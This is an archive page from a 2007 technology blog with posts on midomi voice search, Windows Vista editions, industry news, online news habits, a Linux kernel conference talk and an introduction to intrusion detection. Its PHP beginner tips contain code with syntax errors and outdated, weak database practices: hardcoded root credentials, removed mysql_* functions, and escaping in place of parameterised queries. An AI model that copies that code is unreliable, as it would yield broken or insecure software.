Showing posts with label Information Technology. Show all posts
Showing posts with label Information Technology. Show all posts

Monday, January 29, 2007

Sing and Search the Internet

The search engines are more and more powerful, allowing you to search for all kinds of information including jobs, blog posts, videos, news and even products to buy. At this time, Google is the most known search engine on the internet, being continuously challenged by Yahoo, Ask or Live Search. From time to time, other companies are trying to design innovative services meant to compete with the ones provided by the giant firms.

Midomi is one of the interesting services that were designed to represent a new search technology on the internet that is currently unavailable on the most



known search engines.

“midomi is the ultimate music search tool because it is powered by your voice. Sing, hum, or whistle to instantly find your favorite music and connect with a community that shares your musical interests. Give it a try. It's truly amazing! Our mission is to build the most comprehensive database of searchable music. You can contribute to the database by singing in midomi's online recording studio in any language or genre. The next time anyone searches for a song, your performance might be the top result,” it is mentioned in the description of the search technology.

The idea presented by the midomi is simple: all you need to do is go to the official website of the service, press on the Start Voice Search button and then sing your song. The solution will record your voice and then look for a song that matches your query and return certain results. Midomi is not only a search technology, but it also represents a large community of users that are continuously posting new recordings for songs from all around the world, offering you the possibility to search using predefined or prerecorded sounds.

If you want to test this exciting search engine, you should follow this link and try to avoid blaming your singing talent if the service doesn’t return any relevant result.

Saturday, January 27, 2007

Windows Vista Home Basic, Home Premium, Business, Enterprise and Ultimate – Comparison

With Windows Vista just two days away I thought I would provide you with a detailed comparison between the various editions of Windows Vista. And as the saying goes... one picture is worth a thousand



words, the images at the bottom illustrate all the features of the operating system according to edition.

But of course, you will also be able to judge the differences in your own house. Buy a Windows Vista DVD with a license for Home Basic. Although the license is just for Home Basic, you will be able to install and test all the editions of the operating system, with the exception of Enterprise, which is available only via volume licensing.

However, the single Vista DVD will permit you to install Home Basic, Home Premium, Business and Ultimate and to test drive each edition for free for 30 days. How? Well... during the installation process of the operating system you will be asked to enter the license key. The license key will define the edition of Windows Vista that will be deployed. However, you have the possibility to not enter any license key, install whichever version you prefer and test it. As I've said above, the operating system will deliver a 30 days Initial Grace period with full functionality. You will then be able to upgrade to either Home Premium, Business or Ultimate via Windows Vista Anytime Upgrade.

This is a method that will keep you from spending $399 for Windows Vista Ultimate, when the $239 Vista Home Premium is more than enough for your needs.










IBM to Open Source Novel Identity Protection Software

coondoggie handed us a link to a Network World article reporting that IBM plans to open source the project 'Identity Mixer'. Developed by a Zurich-based research lab for the company, Identity Mixer is a novel approach to protecting user identities online. The project, which is a piece of XML-based software, uses a type of digital certificate to control who has access to identity information in a web browser. IBM is enthusiastic about widespread adoption of this technology, and so plans to open source the project through the Eclipse Open Source Foundation. The company hopes this tactic will see the software's use in commercial, medical, and governmental settings.

Thursday, January 25, 2007

Google Web Search Now Integrates Blog Results

Type in a phrase into Google.com, add the word "blog" at the end of your query and not only will you get web results but more up-to-date gems from Google Blog Search too. That's the word from the Google Operating System weblog. This has been running as a test since November.

Capstone Mobile Selects GE864-Quad for Fleet Tracking Application

Telit Wireless Solutions, Inc., the US-based m2m mobile technology arm of Telit Communications, today announced that Capstone Mobile has signed a supply agreement with Telit. Telit’s module will be used in Capstone Mobile’s fleet tracking devices to enable mobile monitoring and tracking of high value assets.

Capstone Mobile has developed a system that allows customers to manage their vehicle fleets and view tracking information on portable devices such as laptops and PDAs. Useful for not only monitoring fleets of vehicles, this application will monitor the fleets for critical factors such as temperature and humidity level changes, breaches in containers, and, based on variances, recommend environmental adjustments.

“Telit’s modules possess the ability to be both backwards compatible and easily programmable,” said Scott Williamson, Vice President of Capstone Mobile. “Telit is at the top of a launching industry. The need for critical data has never been greater, and Telit has provided the ideal solution for our needs.”

Thanks to its small, external dimensions of 30 x 30 x 2.8 mm and light weight of only seven grams, the GE864 is especially ideal for applications requiring sub-compact form-factors. With the GE864, Telit is the world's first and only module manufacturer to offer a GSM / GPRS module with a ball grid array (BGA) installation concept.

BGA is based on tiny solder balls placed on the underside of a module allowing for direct mounting to the application circuit board, without the need for plugs, cables, or connectors. The module can now be assembled using an automated pick-and-place assembly for standard SMD components. This not only reduces material costs, but also installation time and assembly costs. The board-to-board BGA mounting is extremely stable and reliable. Together, the compact shape and reduced assembly costs are crucial advantages for use in cost-sensitive applications, such as those for the fleet management and consumer markets. The GE864 is the market’s only module viable for very large scale production in these categories.

“Capstone Mobile has a proven, well thought out approach to the application of wireless technology, and we welcome them as the first U.S.-based customer for Telit Wireless Solutions,” said Roger Dewey, President and CEO of Telit Wireless Solutions, Inc. “Their applications are at the cutting edge of the wireless revolution, and together we will ensure they stay there.”

Telit’s approach to m2m is unique—their products are divided into families, each addressing the demands of various vertical markets application groups according to size, production scale, etc. Within these families, products have the same form factor and functionality irrespective of their wireless technology (GSM, CDMA). The advantage for customers is immediately apparent because all modules within a family are interchangeable, due to uniformity in size, shape, connectors and software interface. Customers can easily replace any module with its successor because there is little or no change required to the application.

There are at least ten times more machines, equipment, vehicles and robots than there are humans in the world, creating a critical need to transfer information efficiently between machines or from machines to humans. The relatively new m2m industry delivers increased efficiency, time savings, improved customer orientation and greater flexibility.

BBC To Host Multi-OS Debate

"BBC is currently seeking submissions from all you Microsoft Windows, Mac and Linux devotees "in 100 words or less, why you are such a supporter of your chosen operating system and what features you love about it". They will then select one user of each platform to go head to head in a debate that will be part of the BBC's Microsoft Vista launch coverage on January 30th."

Street Fighting Robot Challenge

"There's no better way to assure the eventual destruction of mankind then by the event sponsored by Singapore's Defence Science and Technology Agency. Newscientist has a good writeup of the robot challenge, which is to build a robot that can operate autonomously in urban warfare conditions, moving in and out of buildings to search and destroy targets like a human soldier."

Tuesday, January 23, 2007

Internet Multitasking Disorder -- And How We Read the News

 


On any given day, Lindsay, a 24-year-old office worker in New York, can be found with several windows open in her Web browser. When she is not sending e-mails or browsing MySpace, she is chatting with her friends or co-workers through AIM – sometimes with multiple conversations going at once.


The New York Times is her homepage, giving her the latest news every morning and recently she downloaded Firefox where she checks the RSS feed for the latest headlines.

This is how Lindsay stays connected to the world. But at times the overflow of information can cause distractions. In an age of instant communication people are accustomed to getting news from multiple sources quickly and constantly, but with so many means of information on her plate, it's easy for Lindsay to just click away – another case of Internet Multitasking Syndrome.

"I think for the most part I'm accustomed to reading the news online as opposed to hardcopy and people like me are the type of person that will be persuaded to click somewhere else," said Lindsay.


Ergositsmall Although Internet Multitasking Syndrome is not a known medical disorder (I just made it up five minutes ago), it is not uncommon for people to become so immersed in their online activities that their cognitive abilities wane. After hours starring at a screen, flipping between web pages and information outlets, people can develop a feeling of anxiety, stress and a decrease in mental performance, said John Suler, author of The Psychology of Cyberspace. "There are limits to how much information one person can process," he continued.

These are symptoms akin to sensory overload, and while it is rare for a person to become so addicted to the Internet that it damages their relationship to friends, family, or performance at work, Suler said that the juggling act which we perform online can effect the way we read the news. "You are getting a cursory understanding of several different sources of information at one time, it's a delicate balance – do you want to get a shallow understanding of lots of different things or a deep grasp of one topic," asked Suler.

Online, most people opt for the quick glance. The average Internet attention span is roughly 10 seconds according to some statistics, allowing humans to just barely beat out gold fish in terms of staying on topic. One major cause of this decrease in attention are hyperlinks, which are built into Web pages allowing people to jump from one digital location to the next.

Blue highlighted words inserted in our text have become commonplace on the Internet, but no one has made an attempt to study what effect it has on our digital culture, said Joseph Turow, a professor at Penn's Annenberg School for Communications.

"We haven't really taken the time to ask what it means when we have an approach to the world where we think of connections in this way. What are the hidden assumptions that places like Google, Yahoo and MSM create for you, to see the world one way or another," said Turow.

Knowing that readers have such a short attention span and that they can click away at any moment, journalists have to approach writing for the Web in a different manner.

"When you write for the Web… you don't beat around the bush, you get to the point quickly, because you don't have the luxury of putting the reader in the mood or creating the intellectual framework for your argument," said Jack Shafer, author of Press Box a column at Slate Magazine.

But writing for the Web doesn't just mimic the wire stories of old. While the speed at which information comes across is similar, the nature of the information is somewhat different. Shafer uses links only as a referencing tool -- a way to site primary sources that back his arguments -- but often bloggers and even journalists use it as a means to highlight conversations that share their political sentiments.

In these circles people are called "ditto-heads," groups of writers and readers that only link and read views that echo their own beliefs. While this might make for a "good" read – and can even capture a readers attention – it fails to address one of journalisms main components: to create a healthy civic discussion.

It leads to wonder if the Internet is a good place to get the news at all. But many journalists see a great potential for online news to inform readers on important issues in their lives. Saul Hansell, a writer for the New York Times, said that newspapers have always known people don't read to the end of a story. With news online this becomes apparent, but it at least provides a breadth of material that is easy to access.

Readers always have something in their peripheral vision and while the Internet allows them to investigate these issues on a shallow level, it also gives them the tools to focus intimately on other matters, said Hansell. "I would take any of these problems over having too little information or information that is to hard to get at."

Lindsay prefers to get her news online. But as she sifts between news feeds, social networking sites, gossip blogs and chats, the lines between reading the news and just plain reading are blurred and one has to wonder if the news suffers.



Monday, January 22, 2007

10 Tips That Every PHP Newbie Should Know

I wish I had known these 10 tips the day I started working with PHP. Instead of learning them through painstaking process, I could have been on my way to becoming a PHP programmer even sooner! This article is presented in two parts and is intended for folks who are new to PHP.
Tip 1: MySQL Connection Class
The majority of web applications I've worked with over the past year have used some variation of this connection class:

class DB {
function DB() {
$this->host = "localhost"; // your host
$this->db = "myDatabase"; // your database
$this->user = "root"; // your username
$this->pass = "mysql"; // your password

$this->link = mysql_connect($this->host, $this->user,
$this->pass);
mysql_select_db($this->db);
}
}

// calls it to action
$db = new $DB;

Simply edit the variables and include this in your files. This doesn't require any knowledge or special understanding to use. Once you've added it to your repertoire, you won't likely need to create a new connection class any time soon. Now you can get to work and quickly connect to your database without a lot of extra markup:

$result = mysql_query("SELECT * FROM table ORDER BY id ASC LIMIT 0,10");

More information can be found in the manual--be sure you read the comments: http://www.php.net/mysql_connect/
Tip 2: Dealing with Magic Quotes
PHP "automagically" can apply slashes to your $_POST data for security purposes. It's an important measure to prevent SQL injections. However, slashes in your scripts can wreak havoc. This is an easy method for dealing with them. The way to handle the slashes is to strip them from our variables. However, what if the magic quotes directive is not enabled?

function magicQuotes($post) {

if (get_magic_quotes_gpc()) {
if (is_array($post) {
return array_map('stripslashes',$post);
} else {
return stripslashes($post);
}
} else {
return; // magic quotes are not ON so we do nothing
}

}

The script above checks to see if magic quotes is enabled. If they are, it will determine if your $_POST data is an array (which it likely is) and then it will strip the slashes accordingly.
Understand that this is not true 'validation'. Be sure to validate all your user-submitted data with regular expressions (which is the most common way to do so).
More information about magic quotes: http://www.php.net/ magic_quotes/
More information about SQL injection: http://www.php.net/manual/en/security.database.sql-injection.php/
More information about regular expressions: http://www.php.net/pcre/
Tip 3: Safely Query Database with mysql_real_escape_string
When you are ready to query your database you will need to escape special characters (quotes for instance) for safety's sake by adding slashes. We apply these before we insert variables into our database. Once again, we need to determine which version of PHP you are running first:

function escapeString($post) {

if (phpversion() >= '4.3.0') {
return array_map('mysql_real_escape_string',$post);
} else {
return array_map('mysql_escape_string',$post);
}

}

More information about mysql_real_escape_string: http://www.php.net/ mysql_real_escape_string/
More information about SQL injection: http://php.belnet.be/manual/en/security.database.sql- injection.php
Tip 4: Debugging
If you search the forum there are many good threads with rules about debugging. The single most important thing you can do is ask PHP to report errors and notices to you by adding this line at the beginning of your scripts:

error_reporting(E_ALL);

This will keep you in line as you learn by printing out errors to your screen. The most common error that E_ALL reports is not actually an error, but a notice for an "Undefined index". Typically, it means that you have not properly set your variable. It's easy to fix and keeps you programming correctly.
Another convenient tool while working with queries is print_r(). If your query is returning null or strange results, simply place this after your query command and it will display all the contents of the $result array.

print_r($result); exit;

The exit command stops your script from executing any further so you can specifically review your query results.
More information about error_reporting: http://www.php.net/ error_reporting/
More information about print_r; http://www.php.net/print_r/
Tip 5: Writing Functions (and Classes)
Initially I thought that tackling functions and classes would be difficult--thankfully I was wrong. Writing a function is something I urge all newbies to start doing immediately--it's really that simple. You are instantly involved in understanding how to produce more efficient code in smaller pieces. Where you might have a line of code that reads like this:

if ($rs['prefix'] == 1) {
$prfx = 'Mrs. ';
} elseif ($rs['prefix'] == 2) {
$prfx = 'Ms. ';
} else {
$prfx = 'Mr. ';
}

echo $prfx.$rs['name'].' '.$rs['last_name'];

You could rewrite it like this in a function:

function makePrefix($prefix='')
{
if (!$prefix) return '';
if ($prefix == 1) return 'Mrs. ';
if ($prefix == 2) return 'Ms. ';
if ($prefix == 3) return 'Mr. ';
}

echo makePrefix($rs['prefix']) . $rs['name'] . ' ' . $rs['last_name'];

Now that you've written this function, you can use it in many different projects!
An easy way to describe classes is to think of it as a collection of functions that work together. Writing a good class requires an understanding of PHP 5's new OOP structure, but by writing functions you are well on your way to some of the greater powers of PHP.
More information about writing functions: http:// www.php.net/manual/en/language.functions.php
More information about writing classes: http:// www.php.net/manual/en/language.oop5.php
Everything I've learned, more or less, came from the manual, trial and error and great help from the many fine people here at PHPBuilder. Good luck programming--and come back soon for Part 2 in this series!

The Anatomy of Pump N' Dump Stock Spamming

"Laura Frieder and Jonathan Zittrain have analyzed pump n' dump spam activity in their paper 'Spam Works: Evidence from Stock Touts and Corresponding Market Activity'. Unbelievably, it appears that spammers are able to achieve a 5% gain on pumped stock before dumping it, along with a dramatic increase in transaction volume of the stock. From the synopsis: ' We suggest that the effectiveness of spammed stock touting calls into question prevailing models of securities regulation that rely principally on the proper labeling of information and disclosure of conflicts of interest to protect consumers, and we propose several regulatory and industry interventions. Based on a large sample of touted stocks listed on the Pink Sheets quotation system, we find that stocks experience a significantly positive return on days prior to heavy touting via spam. Volume of trading responds positively and significantly to heavy touting.'"

Google, Microsoft Escalate Data Center Battle

"The race by Microsoft and Google to build next-generation data centers is intensifying. On Thursday Microsoft announced a $550 million San Antonio project, only to have Google confirm plans for a $600 million site in North Carolina. It appears Google may just be getting started, as it is apparently planning two more enormous data centers in South Carolina, which may cost another $950 million. These 'Death Star' data centers are emerging as a key assets in the competitive struggle between Microsoft and Google, which have both scaled up their spending (as previously discussed on Slashdot). Some pundits, like PBS' Robert X. Cringley, say the scope and cost of these projects reflect the immense scale of Google's ambitions."

Myths, Lies, and Truths about the Linux kernel

slide 00
Hi, as Dave said, I'm Greg, and I've been given the time by the people at OLS to talk to you for a bit about kernel stuff. I'm going to discuss the a number of different lies that people always say about the kernel and try to debunk them; go over a few truths that aren't commonly known, and discuss some myths that I hear repeated a lot.

Now when I mean a myth, I'm referring to something that was believed to have some truth to them, but when you really examine them, they are fictional. Let's call them the "urban myths" of the Linux kernel.

So, to start, let's look at a very common myth that really annoys me a lot:

slide 01
Now I know that almost everyone involved in Linux has heard something like this in the past. About how Linux lacks device support, or really needs to support more hardware, or how we are lagging in the whole area of drivers. I've seen almost this same kind of quote from someone at OSDL a few months back, in my local paper, and it's extreme annoying.

This is really a myth, so people should really know better these days about saying this. So, who said this specific quote?:

slide 02
Ick.

Ok, well, he probably said this a long time ago, back when Linux really didn't support many different things, and when "Plug & Play" was a big deal with ISA buses and stuff:

slide 03
Ugh.

Ok, so maybe I need to spend some time and really debunk this myth as it really isn't true anymore.

So, what is the fact concerning Linux and devices these days. It's this:

slide 04
Yes, that's right, we support more things than anyone else. And more than anyone else ever has in the past. Linux has a very long list of things that we have supported before anyone else ever did. That includes such things as:

  • USB 2.0

  • Bluetooth

  • PCI Hotplug

  • CPU Hotplug

  • memory Hotplug (ok, some of the older Unixes did support CPU and memory hotplug in the past, but no desktop OS still supports this.)

  • wireless USB

  • ExpressCard


and the list can go on, the embedded arena is especially full of drivers that no one else supports.

But there's a real big part of the whole hardware support issue that goes beyond just specific drivers, and that's this:

slide 05
Yes, we passed the NetBSD people a few years ago in the number of different processor families and types that we support now. No other "major" operating system even comes remotely close in platform support for what we have in Linux. Linux now runs in everything from a cellphone, to a radio controlled helicopter, your desktop, a server on the internet, on up to a huge 73% of the TOP500 largest supercomputers in the world.

And remember, almost every different driver that we support, runs on every one of those different platforms. This is something that no one else has ever done in the history of computing. It's just amazing at how flexible and how powerful Linux is this way.

We now have the most scalable and most supported operating system that has ever been created. We have achieved something that is so unique and different and flexible that for people to keep repeating the "Linux doesn't support hardware" myth, is something that everyone needs to stop repeating. As it simply isn't true anymore.

Now, to be fair to Jeff Jaffe, when he said that original quote, he had just become the CTO of Novell, and didn't really have much recent experience with Linux, and did not realize the real state of device support that the modern distros now provide.

Look at the latest versions of Fedora, SuSE, Ubuntu and others. Installation is a complete breeze (way easier than any other operating system installation). You can now plug a new device in and the correct driver is automatically loaded, no need to hunt for a driver disk somewhere, and you are up and running with no need to even reboot.

An example of this, I recently plugged a new USB printer into my laptop, and a dialog box popped up and asked me if I wanted to print a test page on it. That's it, nothing else. If that isn't "plug and play", I really don't know what is.

But not everyone has been ignoring the success of Linux, as is obvious by the size of this conference. Lots of people see Linux and want to use it for their needs, but when they start looking deeper into the kernel, and how it is developed almost the first thing they run into is the total lack of a plan:

slide 06
This lots of people absolutely crazy all the time. You see questions like "Linux has no roadmap so how can I create a product with it", and "How does anyone get anything done since no one is directing anyone", and other things like this.

Well, obviously based on the fact that we are successful at doing something that's never been done before, we must have got here somehow, and be doing something right, but what is it?

Traditionally software is created by determining the requirements for it, writing up a big specification document, reviewing it and getting everyone to agree on it, implement the spec, test it, and so on. In college they teach software engineering methodology like the waterfall method, the iterative process method, formal proof methods, and others. Then there's the new ways of creating programs like extreme programming and top-down design, and so on.

So, what do we do here in the kernel?

slide 07
Dr. Baba studies how businesses work and came to this conclusion after researching how the open source community works and specifically how the Linux kernel is developed and managed.

I guess it makes sense that since we have now created something that has never been done before, we did it by doing something different than anyone else. So, what is it? How is the kernel designed and created? Linus answered this question last year when he said the following to a group of companies when he was asked to explain the kernel design process:

slide 08
This is a really important point that a lot of people don't seem to understand. Actually, I think they understand it, they just really don't like it.

The kernel is not developed with big design documents, feature requests and so on. It evolves over time based on the need at the moment for it. When it first started out, it only supported one type of processor, as that's all it needed to. Later, a second architecture was added, and then more and more as time went on. And each time we added a new architecture, the developers figured out only what was needed to support that specific architecture, and did the work for that. They didn't do the work in the very beginning to allow for the incredible flexibility of different processor types that we have now, as they didn't know what was going to be needed.

The kernel only changes when it needs to, in ways that it needs to change. It has been scaled down to tiny little processors when that need came about, and was scaled way up when other people wanted to do that. And every time that happened, the code was merged back into the tree to let everyone else benefit from the changes, as that's the license that the kernel is released under.

Jonathan on the first day of the conference showed you the huge rate of change that the kernel is under. Tons of new features are added at a gigantic rate, along with bug fixes and other things like cleanups. This shows how fast the kernel is still evolving, almost 15 years after it was created. It's morphed into this thing that is very adaptable and looks almost nothing like what it was even a few years ago. And that's the big reason why Linux is so successful, and why it will keep being successful. It's because we embrace change, and love it, and welcome it.

But one "problem" for a lot of people is that due to this constantly evolving state, the Linux kernel doesn't provide some things that "traditional" operating systems do. Things like an in-kernel stable API. Everyone has heard this one before:

slide 09
For those of you who don't know what an API is, it is the description of how the kernel talks within itself to get things done. It describes things like what the specific functions are that are needed to do a specific task, and how those functions are called.

For Linux, we don't have a stable internal api, and for people to wish that we would have one is just foolish. Almost two years ago, the kernel developers sat down and wrote why Linux doesn't have an in-kernel stable API and published it within the kernel in the file:

slide 10
If you have any questions please go read this file. It explains why Linux doesn't have a stable in-kernel api, and why it never will. It all goes back to the evolution thing. If we were to freeze how the kernel works internally, we would not be able to evolve in ways that we need to do so.

Here's an example that shows how this all works. The Linux USB code has been rewritten at least three times. We've done this over time in order to handle things that we didn't originally need to handle, like high speed devices, and just because we learned the problems of our first design, and to fix bugs and security issues. Each time we made changes in our api, we updated all of the kernel drivers that used the apis, so nothing would break. And we deleted the old functions as they were no longer needed, and did things wrong. Because of this, Linux now has the fastest USB bus speeds when you test out all of the different operating systems. We max out the hardware as fast as it can go, and you can do this from simple userspace programs, no fancy kernel driver work is needed.

Now Windows has also rewritten their USB stack at least 3 times, with Vista, it might be 4 times, I haven't taken a look at it yet. But each time they did a rework, and added new functions and fixed up older ones, they had to keep the old api functions around, as they have taken the stance that they can not break backward compatibility due to their stable API viewpoint. They also don't have access to the code in all of the different drivers, so they can't fix them up. So now the Windows core has all 3 sets of API functions in it, as they can't delete things. That means they maintain the old functions, and have to keep them in memory all the time, and it takes up engineering time to handle all of this extra complexity. That's their business decision to do this, and that's fine, but with Linux, we didn't make that decision, and it helps us remain a lot smaller, more stable, and more secure.

And by secure, I really mean it. A lot of times a security problem will be found in one driver, or in one core part of the kernel, and the kernel developers fix it, and then go and fix it up in all other drivers that have the same problem. Then, when the fix is released, all users of all drivers are now secure. When other operating systems don't have all of the drivers in their tree, if they fix a security problem, it's up to the individual companies to update their drivers and fix the problem too. And that rarely happens. So people who buy the device, and then use the older driver that comes in the box with the device, which is insecure. This has happened a lot recently, and really shows how having a stable api can actually hurt end users, when the original goal was to help developers.

What usually happens after I talk to people about the instability of the kernel api, and how kernel development works, they usually respond with:

slide 11
This just is not true at all. We have a whole sub-architecture that only has 2 users in the world out there. We have drivers that I know have only one user, as there was only one piece of hardware ever made for it. It just isn't true, we will take drivers for anything into our tree, as we really want it.

We want more drivers, no matter how "obscure", because it allows us to see patterns in the code, and realize how we could do things better. If we see a few drivers doing the same thing, we usually take that common code and move it into a shared piece of code, making the individual drivers smaller, and usually fixing things up nicer. We also have merged entire drivers together because they do almost the same thing. An example of this is a USB data acquisition driver that we have in the kernel. There are loads of different USB data acquisition devices out in the world, and one German company send me a driver a while ago to support their devices. It turns out that I was working on a separate driver for a different company that did much the same thing. So, we worked together and merged the two together, and we now have a smaller kernel. That one driver turned out to work for a few other company's devices too, so they simply had to add their device id to the driver and never had to write any new code to get full Linux support. The original German company is happy as their devices are fully supported, which is what their customers wanted, and all of the other companies are very happy, as they really didn't have to do any extra work at all. Everyone wins.

The second thing that people ask me about when it comes to getting code into the kernel is, well, we want to keep our code private, because it is proprietary.

So, here's the simple answer to this issue:

slide 12
That's it, it is very simple. I've had the misfortune of talking to a lot of different IP lawyers over the years about this topic, and every one that I've talked to all agree that there is no way that anyone can create a Linux kernel module, today, that can be closed source. It just violates the GPL due to fun things like derivative works and linking and other stuff. Again, it's very simple.

Now no lawyer will ever come out in public and say this, as lawyer really aren't allowed to make public statements like this at all. But if you hire one, and talk to them in the client/lawyer setting, they will advise you of this issue.

I'm not a lawyer, nor do I want to be one, so don't ask me anything else about this, please. If you have legal questions about license issues, talk to a lawyer, never bring it up on a public mailing list like linux-kernel, which only has programmers. To ask programmers to give legal rulings, in public, is the same as asking us for medical advice. It doesn't make sense at all.

But what would happen if one day the Linux kernel developers suddenly decided to let closed source modules into the kernel? How would that affect how the kernel works and evolves over time?

It turns out that Arjan van de Ven has written up a great thought exercise detailing exactly what would happen if this came true:

slide 13
In his article, which can be found in the linux-kernel archives really easily, he described how only the big distros, Novell and Red Hat, would be able to support any new hardware that came out, but would slowly stagnate as they would not be allowed to change anything that might break the different closed source drivers. And then, if you loaded more than one closed source module, support for your system would pretty much be impossible. Even today, this is easily seen if you try to load more than one closed source module into your system, if anything goes wrong, no company will be willing to support your problem.

The article goes on to show how the community based distros, like Gentoo and Debian, would slowly become obsolete and not work on any new hardware platforms, and dry up as no users would be able to use them anymore. And eventually, in just a few short years, the whole kernel project itself would come to a standstill, unable to innovate or change anything.

It's a really chilling tale, and quite good, please go look it up if you are interested in this topic.

But there's one more aspect of the whole closed source module issue that I really want to bring up, and one that most people ignore. It's this:

slide 14
Remember, no one forces anyone to use Linux. If you don't want to create a Linux kernel module, you don't have to. But if your customers are demanding it, and you decide to do it, you have to play by the rules of the kernel. It's that simple.

And the rule of the kernel is the GPL, it's a simple license, with standard copyright ownership issues, and many lawyers understand it.

When a company says that they need to "protect their intellectual property", that's fine, I and no other kernel developer has any objection to that. But by the same token, you need to respect the kernel developers intellectual property rights. We released our code under the GPL, which states in very specific form, exactly what your rights are when using this code. When you link other code into our body of code, you are obligated by the license of the kernel to also release your code under the same license (when you distribute it.)

When you take the Linux kernel code, and link or build with the header files against it, with your code, and not abide by the well documented license of our code, you are saying that for some reason your code is much more important than the entire rest of the kernel. In short, you are giving every kernel developer who has ever released their code the finger.

So remember, the individual companies are not more important than the kernel, for without the kernel development community, the companies would have no kernel to use at all. Andrew Morton stood up here two years ago and called companies who create closed source modules leaches. I completely agree. What they do is just totally unethical. Some companies try to skirt the license of the law on how they redistribute their closed source code, forcing the end user of it to do the building and linking, which then causes them to violate the GPL if they want to give that prebuilt module to anyone else. These companies are just plain unethical and wrong.

Luckily people are really starting to realize this and the big distros are not accepting this anymore. Here's what Novell publicly stated earlier this year:

slide 15
This means that SuSE 10.1, and SLES and SLED 10 will not have any closed source kernel modules in it at all. This is a very good thing.

Red Hat also includes some text like this in their kernel package, but hasn't come out and said such a public statement.

Alright, enough depressing stuff. After companies realize that the really need to get their code into the kernel tree, they quickly run into one big problem:

slide 16
This really isn't as tough of a problem as it first looks. Remember, the rate of change is about 6000 different patches a kernel release, so some one is getting their code into the tree.

So, how to do it. Luckily, the kernel developers have written down everything that you need to know for how to do kernel development. It's all in one file:

slide 17
Please, point this file out to anyone who has questions on how to do kernel development. It answers about everything that anyone has ever asked, and points people at other places where the answers can be found.

It talks about how the kernel is developed, how to create a patch, how to find your way around the kernel tree, who to send patches to, what the different kernel trees are all about, and it even lists things you should never say on the linux-kernel mailing list if you expect people to take your code seriously.

It's a great file, and if you ever have anything that it doesn't help you out with, please let the author of that file know and they will work to add it. It should be the thing that you give to any manager or developer if they want to learn more about how to get their code into the kernel tree.

One thing that the HOWTO file describes, is various communities that can help people out with kernel development. If you are new to kernel development, there is the:

slide 18
project. This is a very good wiki, a very nice and tame mailing list where you can ask basic questions without feeling bad, and there's also an IRC channel where you can ask questions in realtime to a lot of different kernel developers. If you are just starting out, please go here, it's a very good place to learn.

If you really want to start out doing kernel development, but don't know what to do, the:

slide 19
project is an excellent place to start. They keep a long list of different "janitorial" tasks that the kernel developers have said it would be good to have done to the code base. You can pick from them, and learn the basics of how to create a patch, how to fix your email client to send a proper patch, and then, you get to see your name in the kernel changelog when your patches go in.

I really recommend this project for anyone who wants to start kernel development, but hasn't found anything specific to work on yet. It gets you to search around the kernel tree, fixing up odd things, and by doing that, you will usually find something that interests you that no one else is doing, and you can slowly start to take that portion of the kernel over. I can't recommend this group enough.

And then, there's the big huge mailing list, where everyone lives on:

slide 20
This list gets about 200 emails a day to it, and can be hugely daunting to anyone trying to read it. Here's a hint, almost no one, except Andrew Morton, reads all of the emails on it. The rest of us just use filters, and read the things that interest them. I really suggest just finding some developers that you know provide interesting commentary, and reading the threads they respond to. Or just search for subjects that look interesting. But don't try to read everything, you'll just never get any other work done if you do that.

The Linux kernel mailing list also has another kind of perceived problem. Lots of people can find the reaction of developers on this list as very "harsh" at times. They post their code, and get back scathing reviews of everything they did wrong. Usually the reviewers only criticize the code itself, but for most people, this can be a very hard thing to be on the receiving end of. They just put out what they felt was a perfect thing, only to see it cut into a zillion tiny pieces.

The big problem of this, is we really only have a very small group of people reviewing code in the kernel community. Reviewing code is a hard, unrewarding, tough thing to do. It really makes you grumpy and rude in a very short period of time. I tried it out for a whole week, and at the end of it, I was writing emails like this one:

slide 21
Other people who review code, aren't even as nice as I was here.

I'd like to publicly thank Christoph Hellwig and Randy Dunlap. Both of them spend a lot of time reviewing code on the linux-kernel mailing list, and Christoph especially has a very bad reputation for it. Bad in that people don't like his reviews. But the other kernel developers really do, because he is right. If he tells you something is wrong, and you need to fix it, do it. Don't ignore advice, because everyone else is watching to see if you really do fix up your code as asked to. We need more Christophs in the kernel community.

If everyone could take a few hours a week and review the different patches sent to the mailing list, it would be a great thing. Even if you don't feel like you are a very good developer, read other people's code and ask questions about it. If they can't defend their design and code, then there's something really wrong.

It's also a great way to learn more about programming and the kernel. When you are learning to play an instrument, you don't start out writing full symphonies on your own, you spend years reading other peoples scores, and learning how things are put together and work and interact. Only later do you start writing your own music, small tunes, and then, if you want, working up to bigger pieces. The same goes for programming. You can learn a lot from reading and understanding other people's code. Study the things posted, and ask why things are done specific ways, and point out problems that you have noticed. It's a task that the kernel really needs help with right now.

(possible side story about the quote)

Alright, but what if you want to help out with the kernel, but you aren't a programmer. What can you do? Last year Dave Jones told everyone that the kernel was going to pieces, with loads of bugs being found and no end in sight. A number of people made the response:

slide 22
Now, this is true, it would be great to have a simple set of tests that everyone could run for every release to ensure that nothing was broken and that everything's just right. But unfortunately, we don't have such a test suite just yet. The only set of real tests we have, is for everyone to run the kernel on their machines, and to let us know if it works for them.

So, that's what I suggest for people who want to help out, yet are not programmers. Please, run the nightly snapshots from Linus's kernel tree on your machine, and complain loudly if something breaks. If no one pays attention, complain again. Be really persistent. File bugs in:

slide 23
People do track things there. Sometimes it doesn't feel like it, but again, be persistent. If someone keeps complaining about something, we do feel bad, and work to try to fix things. Don't feel bad about being a pest, because we need more pests to keep all of us kernel developers in line.

And if you really feel brave, please, run Andrew Morton's -mm kernel tree. It contains all of the different kernel maintainer's development trees combined into one big mass of instability. It is the proving ground for what will eventually go into Linus's kernel tree. So we need people testing this kernel out to report problems early, before they go into Linus's tree.

I wouldn't recommend running Andrew's kernels on a machine with data that you care about, that would not be wise. So if you have a spare machine, or you have a very good backup policy, please, run his kernels and let us know if you have any problems with stuff.

So finally, in conclusion, here's the main things that I hope people remember:

slide 24
slide 25
slide 26
slide 27
slide 28
slide 29

What is IDS?

IDS is an acronym for Intrusion Detection System. An intrusion detection system detects intruders; that is, unexpected, unwanted or unauthorized people or programs on my computer network.

Why do I need IDS? A network firewall will keep the bad guys off my network, right? And my anti-virus will recognize and get rid of any virus I might catch, right? And my password-protected access control will stop the office cleaner trawling through my network after I've gone home, right? So that's it - I'm fully protected, right?

Wrong!

A firewall has got holes to let things through: without it, you wouldn't be able to access the Internet or send or receive emails. Anti-virus systems are only good at detecting viruses they already know about. And passwords can be hacked, stolen or left lying about on post-its.

